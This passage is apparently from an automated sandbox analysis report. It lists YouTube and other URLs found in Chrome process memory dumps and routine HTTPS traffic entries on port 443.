00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474598295.000028EC02B94000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500594658.000028EC06708000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488508263.000028EC03CD0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000000.00000003.2323529169.000028EC04BB9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370154176.000028EC062EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2369897325.000028EC07F03000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323428029.000028EC04BD5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323304427.000028EC06A9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si
Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497731752.000028EC04DF8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=
Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=2rCuE23kHaX4E8A
Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501943849.000028EC06D2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393532398.000028EC063EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370451846.000028EC04B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2342874633.000028EC06378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485699742.000028EC0384C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505400410.000028EC07AEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX
Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494918575.000028EC046E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400603614.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX(
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXM$
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXdator
Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXler
Source: chrome.exe, 00000000.00000003.2356104978.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2371291317.000028EC0800B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2364902944.000028EC07FB3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361454430.000028EC07F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si
Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=
Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=-htCYBtW0ws255C
Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329678735.000028EC06310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2356027264.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393532398.000028EC063EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342010290.000028EC04DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474534440.000028EC02B84000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws
Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329951400.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws(
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsdator
Source: chrome.exe, 00000000.00000002.2499056442.000028EC0621C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjSQ?
Source: chrome.exe, 00000000.00000002.2508320989.000028EC07F03000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497331456.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496982560.000028EC04B21000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496056454.000028EC048D5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482855525.000028EC03537000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2493480651.000028EC04191000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si
Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487214642.000028EC03B30000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=
Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484973258.000028EC03774000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385463463.000028EC0803B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2323165506.000028EC04C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2508320989.000028EC07F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2302249757.000028EC04D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496886639.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR
Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320456301.000028EC04810000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR(
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRator
Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRc);
Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=rXkudamggTRB6DF
Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?siYrX
Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491838575.000028EC04094000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6Uh0?
Source: chrome.exe, 00000000.00000002.2488324966.000028EC03C88000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/generate_204?cDRRTQ
Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/generate_204?oFXXFw
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/generate_204?xfMLzA
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/iframe_api
Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/desktop/fc303b88/jsbin/lottie-light.vflset/lottie-light.js
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505015083.000028EC07974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js
Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315986851.000028EC0102A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js
Source: chrome.exe, 00000000.00000003.2332503048.000028EC04B10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.jsaDb
Source: chrome.exe, 00000000.00000003.2330677012.000028EC001CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js
Source: chrome.exe, 00000000.00000002.2501993718.000028EC06D4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js
Source: chrome.exe, 00000000.00000002.2485391480.000028EC037F0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=FURi5aHgp1g
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%
Source: chrome.exe, 00000000.00000003.2370628411.000028EC03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385463463.000028EC0803B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2370451846.000028EC04B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474534440.000028EC02B84000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370551942.000028EC038DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484699862.000028EC03718000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385463463.000028EC08033000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370498638.000028EC033A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2506106388.000028EC07C5C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856897726.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370551942.000028EC038DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/youtubei/v1/log_event?alt=json
Source: chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comcross-origin-resource-policy:cross-originaccess-control-allow-credentials:tru
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://yieldlab.net
Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470116117.000028EC02558000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489810514.000028EC03EC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2502048114.000028EC06D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480846916.000028EC03334000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486301784.000028EC03948000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/l/
Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yt3.ggpht.com/ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA
Source: chrome.exe, 00000000.00000002.2487485402.000028EC03B85000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2471255420.000028EC02708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378517392.000028EC047E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489230157.000028EC03E5A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yt3.ggpht.com/ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49677
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
